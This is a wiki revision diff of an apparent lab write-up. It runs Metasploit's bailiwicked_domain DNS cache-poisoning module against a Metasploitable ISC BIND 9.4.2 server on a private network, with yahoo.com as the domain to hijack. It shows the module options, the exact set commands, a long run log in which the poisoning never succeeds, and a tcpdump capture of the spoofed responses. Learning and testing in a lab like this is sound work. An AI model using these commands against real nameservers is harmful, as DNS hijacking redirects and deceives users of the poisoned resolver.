Metasploitable/DNS Bind: Difference between revisions
From charlesreid1
(Created page with "=Searching= Searching for bind exploits: <pre> msf > search bind Matching Modules ================ Name Dis...") |
|||
| (30 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
=Searching= | =Searching for Exploits= | ||
Searching for | Searching for exploits of the DNS service that is running, ISC BIND 9.4.2, we find the following exploit: https://www.exploit-db.com/exploits/6122/ | ||
This exploit is labeled <code>auxiliary/spoof/dns/bailiwicked_domain</code>. It allows us to insert malicious DNS records into the DNS server. | |||
==DNS Exploit: bailiwicked domain== | |||
In plain English, this attack allows you to add your own DNS entries to a target DNS nameserver. Thus, you could create a DNS entry like somethingveryevil.microsoft.com that would direct visitors wherever you wish. | |||
We can use this exploit by running: | |||
<pre> | <pre> | ||
msf > | msf > use auxiliary/spoof/dns/bailiwicked_domain | ||
</pre> | |||
More information: | |||
<pre> | |||
This exploit targets a fairly ubiquitous flaw in DNS implementations | |||
which allow the insertion of malicious DNS records into the cache of the | |||
target nameserver. This exploit caches a single malicious nameserver | |||
entry into the target nameserver which replaces the legitimate | |||
nameservers for the target domain. By causing the target nameserver to | |||
query for random hostnames at the target domain, the attacker can spoof | |||
a response to the target server including an answer for the query, an | |||
authority server record, and an additional record for that server, | |||
causing target nameserver to insert the additional record into the | |||
cache. This insertion completely replaces the original nameserver | |||
records for the target domain. | |||
</pre> | </pre> | ||
To interpret: | |||
* Metasploit induces the target nameserver to ask for information from a target domain. It then gathers information about the responses to craft its attack. | |||
* Metasploit then induces the target nameserver to ask for random subdomains at the target domain, and sends fake responses from the target domain back to the target nameserver in an attempt to confuse the target nameserver. | |||
* When the attack/spoofing is successful, the target nameserver will receive a new authority server record (faked by Metasploit), and will insert this new record into its DNS cache. | |||
* This means the target nameserver has a new DNS record for the target domain, containing whatever DNS servers were set in the Metasploit attack. | |||
* Now, anyone requesting the target domain from the target nameserver will actually be routed to your (malicious) nameserver, where you can tamper with the request before forwarding it along. | |||
===Setting up bailiwicked domain attack=== | |||
We can set up the attack by setting the remote host and the various options through Metasploit. | |||
Start by loading the exploit and showing the available options: | |||
<pre> | |||
msf > use auxiliary/spoof/dns/bailiwicked_domain | |||
msf auxiliary(bailiwicked_domain) > show options | |||
Module options (auxiliary/spoof/dns/bailiwicked_domain): | |||
Name Current Setting Required Description | |||
---- --------------- -------- ----------- | |||
DOMAIN example.com yes The domain to hijack | |||
INTERFACE no The name of the interface | |||
NEWDNS yes The hostname of the replacement DNS server | |||
RECONS 208.67.222.222 yes The nameserver used for reconnaissance | |||
RHOST yes The target address | |||
SNAPLEN 65535 yes The number of bytes to capture | |||
SRCADDR Real yes The source address to use for sending the queries (Accepted: Real, Random) | |||
SRCPORT yes The target server's source query port (0 for automatic) | |||
TIMEOUT 500 yes The number of seconds to wait for new data | |||
TTL 33918 yes The TTL for the malicious host entry | |||
XIDS 0 yes The number of XIDs to try for each query (0 for automatic) | |||
msf auxiliary(bailiwicked_domain) > | |||
</pre> | |||
The default recons dns server is an OpenDNS server: http://whatismyipaddress.com/ip/208.67.222.222 | |||
<pre> | |||
msf auxiliary(bailiwicked_domain) > set DOMAIN yahoo.com | |||
DOMAIN => yahoo.com | |||
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com | |||
NEWDNS => dns01.metasploit.com | |||
msf auxiliary(bailiwicked_domain) > set RHOST 10.0.0.27 | |||
RHOST => 10.0.0.27 | |||
msf auxiliary(bailiwicked_domain) > set SRCPORT 0 | |||
SRCPORT => 0 | |||
msf auxiliary(bailiwicked_domain) > | |||
</pre> | |||
Locked and loaded. | |||
Here's the before: | |||
<pre> | |||
msf auxiliary(bailiwicked_domain) > dig +short -t ns yahoo.com @10.0.0.27 | |||
[*] exec: dig +short -t ns yahoo.com @10.0.0.27 | |||
ns6.yahoo.com. | |||
ns1.yahoo.com. | |||
ns4.yahoo.com. | |||
ns5.yahoo.com. | |||
ns2.yahoo.com. | |||
ns3.yahoo.com. | |||
msf auxiliary(bailiwicked_domain) > | |||
</pre> | |||
Let's rock. | |||
===Check bailiwicked domain attack=== | |||
Normally, you should be able to run <code>check</code> to check everything and make sure it will run ok. This fails: | |||
<pre> | |||
msf > use auxiliary/spoof/dns/bailiwicked_domain | |||
msf auxiliary(bailiwicked_domain) > set RHOST 10.0.0.27 | |||
RHOST => 10.0.0.27 | |||
msf auxiliary(bailiwicked_domain) > set SRCPORT 0 | |||
SRCPORT => 0 | |||
msf auxiliary(bailiwicked_domain) > set NEWDNS 8.8.8.8 | |||
NEWDNS => 8.8.8.8 | |||
msf auxiliary(bailiwicked_domain) > check | |||
[*] 10.0.0.27 - Cannot reliably check exploitability. | |||
msf auxiliary(bailiwicked_domain) > | |||
</pre> | |||
Not sure why. | |||
===Attack failure=== | |||
The attack fails. The DNS poisoning attempts continue indefinitely, but never finish. The output below took around 2 hours to generate. | |||
{{Scroll box| | |||
<pre> | |||
msf auxiliary(bailiwicked_domain) > run | |||
[*] Targeting nameserver 10.0.0.27 for injection of yahoo.com. nameservers as dns01.metasploit.com | |||
[*] Querying recon nameserver for yahoo.com.'s nameservers... | |||
[*] Got an NS record: yahoo.com. 42580 IN NS ns1.yahoo.com. | |||
[*] Querying recon nameserver for address of ns1.yahoo.com.... | |||
[*] Got an A record: ns1.yahoo.com. 304097 IN A 68.180.131.16 | |||
[*] Checking Authoritativeness: Querying 68.180.131.16 for yahoo.com.... | |||
[*] ns1.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: yahoo.com. 42580 IN NS ns2.yahoo.com. | |||
[*] Querying recon nameserver for address of ns2.yahoo.com.... | |||
[*] Got an A record: ns2.yahoo.com. 467535 IN A 68.142.255.16 | |||
[*] Checking Authoritativeness: Querying 68.142.255.16 for yahoo.com.... | |||
[*] ns2.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: yahoo.com. 42580 IN NS ns5.yahoo.com. | |||
[*] Querying recon nameserver for address of ns5.yahoo.com.... | |||
[*] Got an A record: ns5.yahoo.com. 313840 IN A 119.160.247.124 | |||
[*] Checking Authoritativeness: Querying 119.160.247.124 for yahoo.com.... | |||
[*] ns5.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: yahoo.com. 42580 IN NS ns3.yahoo.com. | |||
[*] Querying recon nameserver for address of ns3.yahoo.com.... | |||
[*] Got an A record: ns3.yahoo.com. 604800 IN A 203.84.221.53 | |||
[*] Checking Authoritativeness: Querying 203.84.221.53 for yahoo.com.... | |||
[*] ns3.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: yahoo.com. 42580 IN NS ns6.yahoo.com. | |||
[*] Querying recon nameserver for address of ns6.yahoo.com.... | |||
[*] Got an A record: ns6.yahoo.com. 127760 IN A 121.101.144.139 | |||
[*] Checking Authoritativeness: Querying 121.101.144.139 for yahoo.com.... | |||
[*] ns6.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as | |||
[*] Got an NS record: yahoo.com. 42580 IN NS ns4.yahoo.com. | |||
[*] Querying recon nameserver for address of ns4.yahoo.com.... | |||
[*] Got an A record: ns4.yahoo.com. 300799 IN A 98.138.11.157 | |||
[*] Checking Authoritativeness: Querying 98.138.11.157 for yahoo.com.... | |||
[*] ns4.yahoo.com. is authoritative for yahoo.com., adding to list of nameservers to spoof as | |||
[*] Calculating the number of spoofed replies to send per query... | |||
[*] race calc: 100 queries | min/max/avg time: 0.01/0.78/0.16 | min/max/avg replies: 4/950/133 | |||
[*] Sending 33 spoofed replies from each nameserver (6) for each query | |||
[*] Attempting to inject poison records for yahoo.com.'s nameservers into 10.0.0.27:0... | |||
[*] Sent 1000 queries and 198000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.78/0.22 | min/max/avg replies: 10/688/186 | |||
[*] Now sending 46 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 2000 queries and 474000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.61/0.16 | min/max/avg replies: 2/526/131 | |||
[*] Now sending 32 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 3000 queries and 666000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.76/0.14 | min/max/avg replies: 10/889/128 | |||
[*] Now sending 32 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 4000 queries and 858000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.77/0.17 | min/max/avg replies: 10/581/139 | |||
[*] Now sending 34 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 5000 queries and 1062000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.73/0.14 | min/max/avg replies: 14/636/116 | |||
[*] Now sending 29 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 6000 queries and 1236000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.7/0.16 | min/max/avg replies: 8/602/137 | |||
[*] Now sending 34 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 7000 queries and 1440000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.67/0.16 | min/max/avg replies: 9/579/129 | |||
[*] Now sending 32 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 8000 queries and 1632000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.68/0.14 | min/max/avg replies: 12/592/115 | |||
[*] Now sending 28 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 9000 queries and 1800000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.18/0.21 | min/max/avg replies: 14/1039/186 | |||
[*] Now sending 46 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 10000 queries and 2076000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.57/0.15 | min/max/avg replies: 6/448/124 | |||
[*] Now sending 31 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 11000 queries and 2262000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.73/0.18 | min/max/avg replies: 12/876/176 | |||
[*] Now sending 44 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 12000 queries and 2526000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.67/0.17 | min/max/avg replies: 8/508/141 | |||
[*] Now sending 35 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 13000 queries and 2736000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.02/0.7/0.14 | min/max/avg replies: 11/726/123 | |||
[*] Now sending 30 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 14000 queries and 2916000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.19/0.16 | min/max/avg replies: 14/823/125 | |||
[*] Now sending 31 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 15000 queries and 3102000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.1/0.15 | min/max/avg replies: 8/634/97 | |||
[*] Now sending 24 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 16000 queries and 3246000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.13 | min/max/avg replies: 7/408/77 | |||
[*] Now sending 19 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 17000 queries and 3360000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/10.24/0.65 | min/max/avg replies: 9/17339/883 | |||
[*] Now sending 220 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 18000 queries and 4680000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.77/0.13 | min/max/avg replies: 5/900/105 | |||
[*] Now sending 26 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 19000 queries and 4836000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.02/0.67/0.19 | min/max/avg replies: 17/351/114 | |||
[*] Now sending 28 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 20000 queries and 5004000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.03/1.36/0.2 | min/max/avg replies: 15/1161/116 | |||
[*] Now sending 29 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 21000 queries and 5178000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.32/0.19 | min/max/avg replies: 9/1391/137 | |||
[*] Now sending 34 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 22000 queries and 5382000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.81/0.21 | min/max/avg replies: 8/1189/157 | |||
[*] Now sending 39 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 23000 queries and 5616000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.73/0.17 | min/max/avg replies: 10/775/126 | |||
[*] Now sending 31 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 24000 queries and 5802000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.22/0.16 | min/max/avg replies: 5/1046/115 | |||
[*] Now sending 28 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 25000 queries and 5970000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.77/0.16 | min/max/avg replies: 10/894/120 | |||
[*] Now sending 30 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 26000 queries and 6150000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.02/0.76/0.18 | min/max/avg replies: 6/969/161 | |||
[*] Now sending 40 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 27000 queries and 6390000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.75/0.19 | min/max/avg replies: 12/667/124 | |||
[*] Now sending 31 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 28000 queries and 6576000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.7/0.18 | min/max/avg replies: 8/776/127 | |||
[*] Now sending 31 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 29000 queries and 6762000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.77/0.16 | min/max/avg replies: 9/589/107 | |||
[*] Now sending 26 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 30000 queries and 6918000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.12 | min/max/avg replies: 9/837/91 | |||
[*] Now sending 22 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 31000 queries and 7050000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.02/1.1/0.18 | min/max/avg replies: 15/1410/161 | |||
[*] Now sending 40 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 32000 queries and 7290000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.72/0.15 | min/max/avg replies: 3/550/96 | |||
[*] Now sending 24 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 33000 queries and 7434000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.67/0.14 | min/max/avg replies: 7/743/96 | |||
[*] Now sending 24 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 34000 queries and 7578000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.08/0.18 | min/max/avg replies: 7/810/136 | |||
[*] Now sending 34 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 35000 queries and 7782000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.67/0.18 | min/max/avg replies: 7/436/114 | |||
[*] Now sending 28 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 36000 queries and 7950000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.06/1.07/0.17 | min/max/avg replies: 39/596/107 | |||
[*] Now sending 26 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 37000 queries and 8106000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.78/0.19 | min/max/avg replies: 10/668/138 | |||
[*] Now sending 34 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 38000 queries and 8310000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.14 | min/max/avg replies: 8/425/87 | |||
[*] Now sending 21 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 39000 queries and 8436000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.77/0.21 | min/max/avg replies: 10/463/131 | |||
[*] Now sending 32 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 40000 queries and 8628000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.17 | min/max/avg replies: 9/443/107 | |||
[*] Now sending 26 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 41000 queries and 8784000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.02/0.6/0.14 | min/max/avg replies: 9/380/82 | |||
[*] Now sending 20 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 42000 queries and 8904000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.16 | min/max/avg replies: 11/433/95 | |||
[*] Now sending 23 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 43000 queries and 9042000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.7/0.19 | min/max/avg replies: 9/431/116 | |||
[*] Now sending 29 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 44000 queries and 9216000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.16 | min/max/avg replies: 8/869/117 | |||
[*] Now sending 29 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 45000 queries and 9390000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.18/0.16 | min/max/avg replies: 9/712/99 | |||
[*] Now sending 24 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 46000 queries and 9534000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.2 | min/max/avg replies: 10/434/123 | |||
[*] Now sending 30 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 47000 queries and 9714000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.08/0.2 | min/max/avg replies: 1/922/141 | |||
[*] Now sending 35 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 48000 queries and 9924000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.15 | min/max/avg replies: 11/413/94 | |||
[*] Now sending 23 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 49000 queries and 10062000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.12/0.19 | min/max/avg replies: 7/1025/108 | |||
[*] Now sending 27 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 50000 queries and 10224000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.72/0.14 | min/max/avg replies: 9/651/92 | |||
[*] Now sending 23 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 51000 queries and 10362000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.02/1.17/0.18 | min/max/avg replies: 7/647/97 | |||
[*] Now sending 24 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 52000 queries and 10506000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.08/1.19/0.23 | min/max/avg replies: 29/1296/153 | |||
[*] Now sending 38 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 53000 queries and 10734000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.13 | min/max/avg replies: 2/420/87 | |||
[*] Now sending 21 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 54000 queries and 10860000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.18/0.15 | min/max/avg replies: 9/813/102 | |||
[*] Now sending 25 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 55000 queries and 11010000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.06/0.59/0.11 | min/max/avg replies: 39/365/70 | |||
[*] Now sending 17 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 56000 queries and 11112000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.19/0.14 | min/max/avg replies: 11/687/91 | |||
[*] Now sending 22 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 57000 queries and 11244000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/1.18/0.21 | min/max/avg replies: 9/776/139 | |||
[*] Now sending 34 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 58000 queries and 11448000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.15 | min/max/avg replies: 10/725/110 | |||
[*] Now sending 27 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 59000 queries and 11610000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.67/0.17 | min/max/avg replies: 3/449/105 | |||
[*] Now sending 26 spoofed replies from each nameserver (6) for each query | |||
[*] Sent 60000 queries and 11766000 spoofed responses... | |||
[*] Recalculating the number of spoofed replies to send per query... | |||
[*] race calc: 25 queries | min/max/avg time: 0.01/0.69/0.19 | min/max/avg replies: 11/480/128 | |||
[*] Now sending 32 spoofed replies from each nameserver (6) for each query | |||
</pre> | |||
}} | |||
===Tcpdump during bailiwicked domain attack=== | |||
If you monitor your network interface in another window with tcpdump, you'll see this creates a HUGE amount of DNS packet traffic. | |||
On a low-traffic server, this will cause a noticeable spike in traffic, and probably raise some eyebrows and get the IT crew on your case. The traffic graph shown below shows the traffic spike that the target domain (example.com, or yahoo.com, or whatever you pick) sees. The blue spike is incoming traffic, and is caused by this DNS bind attack: | |||
[[Image:TrafficSpike.png|500px]] | |||
THIS ATTACK IS NOT SUBTLE. | |||
<pre> | |||
# tcpdump -i eth0 | |||
[...] | |||
23:55:27.992636 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108) | |||
23:55:27.993049 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108) | |||
23:55:27.993480 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108) | |||
23:55:27.993894 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108) | |||
23:55:27.994786 IP morpheus.48140 > 10.0.0.27.domain: 38614+ A? pnJt2DO12GBApJy9.yahoo.com. (44) | |||
23:55:27.995487 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) | |||
23:55:27.995909 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) | |||
23:55:27.996341 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) | |||
23:55:27.996721 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2421896:2426028, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132 | |||
23:55:27.996786 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2426028:2430160, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132 | |||
23:55:27.996962 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) | |||
23:55:27.997090 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2430160:2434292, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132 | |||
23:55:27.997216 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2434292:2438424, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132 | |||
23:55:27.997507 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2438424:2442556, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132 | |||
23:55:27.997642 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) | |||
23:55:27.997760 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2442556:2446688, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132 | |||
23:55:27.997929 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2446688:2454952, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 8264 | |||
23:55:27.998195 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107) | |||
23:55:28.000837 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], seq 2454952:2472328, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 17376 | |||
23:55:28.000880 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], seq 2472328:2492600, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 20272 | |||
23:55:28.000921 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2492600:2508844, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 16244 | |||
23:55:28.001045 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2508844:2509476, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387139], length 632 | |||
23:55:28.001580 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107) | |||
23:55:28.002006 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107) | |||
23:55:28.002424 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107) | |||
23:55:28.002846 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107) | |||
23:55:28.003133 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], ack 1549, win 46, options [nop,nop,TS val 64578983 ecr 902387140], length 0 | |||
[...] | |||
23:55:28.366030 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110) | |||
23:55:28.366489 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110) | |||
